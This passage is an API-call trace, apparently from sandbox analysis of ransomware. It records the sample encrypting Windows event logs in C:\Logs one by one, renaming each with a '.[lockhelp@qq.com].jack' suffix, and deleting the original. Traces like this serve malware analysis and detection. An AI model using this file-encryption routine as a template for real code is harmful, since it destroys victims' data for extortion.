(lpString1=".pdf", lpString2="evtx") returned -1 [0209.708] lstrlenW (lpString=".xls") returned 4 [0209.708] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.708] lstrlenW (lpString=".xlsx") returned 5 [0209.708] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.709] lstrlenW (lpString=".ppt") returned 4 [0209.709] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.709] lstrlenW (lpString=".zip") returned 4 [0209.709] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString=".rar") returned 4 [0209.709] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString=".bz2") returned 4 [0209.709] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString=".7z") returned 3 [0209.709] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.709] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.709] lstrlenW (lpString=".dbf") returned 4 [0209.709] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.709] lstrlenW (lpString=".1cd") returned 4 [0209.709] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.709] lstrlenW (lpString=".jpg") returned 4 [0209.709] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.709] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.709] lstrlenW (lpString=".doc") returned 4 [0209.709] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString=".docx") returned 5 [0209.709] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.709] lstrlenW (lpString=".pdf") returned 4 [0209.709] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString=".xls") returned 4 [0209.709] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.709] lstrlenW (lpString=".xlsx") returned 5 [0209.709] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.709] lstrlenW (lpString=".ppt") returned 4 [0209.710] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.710] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.710] lstrlenW (lpString=".zip") returned 4 [0209.710] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.710] lstrlenW (lpString=".rar") returned 4 [0209.710] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.710] lstrlenW (lpString=".bz2") returned 4 [0209.710] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.710] lstrlenW (lpString=".7z") returned 3 [0209.710] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.710] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.710] lstrlenW (lpString=".dbf") returned 4 [0209.710] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.710] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.710] lstrlenW (lpString=".1cd") returned 4 [0209.710] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.710] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.710] lstrlenW (lpString=".jpg") returned 4 [0209.710] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.710] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.710] lstrlenW (lpString="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 46 [0209.710] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.711] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0209.711] CloseHandle (hObject=0x3dc) returned 1 [0209.711] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 0x20 [0209.711] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.712] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.712] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.712] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.712] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0209.727] GetLastError () returned 0x0 [0209.727] ReadFile (in: hFile=0x420, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.737] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.739] ReadFile (in: hFile=0x420, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.739] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x130, lpOverlapped=0x0) returned 1 [0209.739] SetEndOfFile (hFile=0x438) returned 1 [0209.749] CloseHandle (hObject=0x438) returned 1 [0209.751] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.751] SetEndOfFile (hFile=0x420) returned 1 [0209.753] CloseHandle (hObject=0x420) returned 1 [0209.753] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.754] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-readyboost%4operational.evtx")) returned 1 [0209.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.755] lstrlenW (lpString=".doc") returned 4 [0209.755] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString=".docx") returned 5 [0209.755] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.755] lstrlenW (lpString=".pdf") returned 4 [0209.755] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString=".xls") returned 4 [0209.755] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString=".xlsx") returned 5 [0209.755] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.755] lstrlenW (lpString=".ppt") returned 4 [0209.755] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.755] lstrlenW (lpString=".zip") returned 4 [0209.755] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString=".rar") returned 4 [0209.755] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString=".bz2") returned 4 [0209.755] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString=".7z") returned 3 [0209.755] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.755] lstrlenW (lpString=".dbf") returned 4 [0209.755] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.755] lstrlenW (lpString=".1cd") returned 4 [0209.755] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.756] lstrlenW (lpString=".jpg") returned 4 [0209.756] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.756] lstrlenW (lpString=".doc") returned 4 [0209.756] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString=".docx") returned 5 [0209.756] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.756] lstrlenW (lpString=".pdf") returned 4 [0209.756] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString=".xls") returned 4 [0209.756] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString=".xlsx") returned 5 [0209.756] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.756] lstrlenW (lpString=".ppt") returned 4 [0209.756] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.756] lstrlenW (lpString=".zip") returned 4 [0209.756] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString=".rar") returned 4 [0209.756] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString=".bz2") returned 4 [0209.756] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.756] lstrlenW (lpString=".7z") returned 3 [0209.756] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.757] lstrlenW (lpString=".dbf") returned 4 [0209.757] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.757] lstrlenW (lpString=".1cd") returned 4 [0209.757] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned 54 [0209.757] lstrlenW (lpString=".jpg") returned 4 [0209.757] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.757] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.757] lstrlenW (lpString="Microsoft-Windows-SettingSync%4Operational.evtx") returned 47 [0209.757] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0210.260] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0210.260] CloseHandle (hObject=0x3b8) returned 1 [0210.260] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 0x20 [0210.261] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.826] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.826] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.827] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.827] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0210.827] GetLastError () returned 0x0 [0210.827] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.829] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.831] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.831] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x132, lpOverlapped=0x0) returned 1 [0210.831] SetEndOfFile (hFile=0x450) returned 1 [0210.831] CloseHandle (hObject=0x450) returned 1 [0210.832] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.833] SetEndOfFile (hFile=0x44c) returned 1 [0210.834] CloseHandle (hObject=0x44c) returned 1 [0210.834] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.834] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx")) returned 1 [0210.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.834] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.834] lstrlenW (lpString=".doc") returned 4 [0210.834] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.834] lstrlenW (lpString=".docx") returned 5 [0210.834] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.834] lstrlenW (lpString=".pdf") returned 4 [0210.834] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.834] lstrlenW (lpString=".xls") returned 4 [0210.834] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.834] lstrlenW (lpString=".xlsx") returned 5 [0210.834] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.834] lstrlenW (lpString=".ppt") returned 4 [0210.835] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString=".zip") returned 4 [0210.835] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".rar") returned 4 [0210.835] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".bz2") returned 4 [0210.835] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".7z") returned 3 [0210.835] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString=".dbf") returned 4 [0210.835] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString=".1cd") returned 4 [0210.835] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString=".jpg") returned 4 [0210.835] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString=".doc") returned 4 [0210.835] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".docx") returned 5 [0210.835] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.835] lstrlenW (lpString=".pdf") returned 4 [0210.835] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".xls") returned 4 [0210.835] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".xlsx") returned 5 [0210.835] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.835] lstrlenW (lpString=".ppt") returned 4 [0210.835] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.835] lstrlenW (lpString=".zip") returned 4 [0210.835] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.835] lstrlenW (lpString=".rar") returned 4 [0210.836] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.836] lstrlenW (lpString=".bz2") returned 4 [0210.836] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.836] lstrlenW (lpString=".7z") returned 3 [0210.836] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.836] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.836] lstrlenW (lpString=".dbf") returned 4 [0210.836] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.836] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.836] lstrlenW (lpString=".1cd") returned 4 [0210.836] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.836] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned 55 [0210.836] lstrlenW (lpString=".jpg") returned 4 [0210.836] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.836] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0210.836] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 47 [0210.836] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.836] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0210.836] CloseHandle (hObject=0x44c) returned 1 [0210.836] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 0x20 [0210.836] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0210.837] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0210.837] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.837] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.837] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0210.837] GetLastError () returned 0x0 [0210.837] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0210.843] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0210.845] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0210.845] WriteFile (in: hFile=0x450, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x132, lpOverlapped=0x0) returned 1 [0210.845] SetEndOfFile (hFile=0x450) returned 1 [0210.845] CloseHandle (hObject=0x450) returned 1 [0210.847] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0210.847] SetEndOfFile (hFile=0x44c) returned 1 [0210.848] CloseHandle (hObject=0x44c) returned 1 [0210.848] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0210.848] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 1 [0210.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.848] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.848] lstrlenW (lpString=".doc") returned 4 [0210.848] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.848] lstrlenW (lpString=".docx") returned 5 [0210.848] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0210.848] lstrlenW (lpString=".pdf") returned 4 [0210.848] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0210.848] lstrlenW (lpString=".xls") returned 4 [0210.849] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".xlsx") returned 5 [0210.849] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0210.849] lstrlenW (lpString=".ppt") returned 4 [0210.849] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.849] lstrlenW (lpString=".zip") returned 4 [0210.849] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".rar") returned 4 [0210.849] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".bz2") returned 4 [0210.849] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".7z") returned 3 [0210.849] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0210.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.849] lstrlenW (lpString=".dbf") returned 4 [0210.849] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.849] lstrlenW (lpString=".1cd") returned 4 [0210.849] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.849] lstrlenW (lpString=".jpg") returned 4 [0210.849] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.849] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0210.849] lstrlenW (lpString=".doc") returned 4 [0210.849] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0210.849] lstrlenW (lpString=".docx") returned 5 [0210.849] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 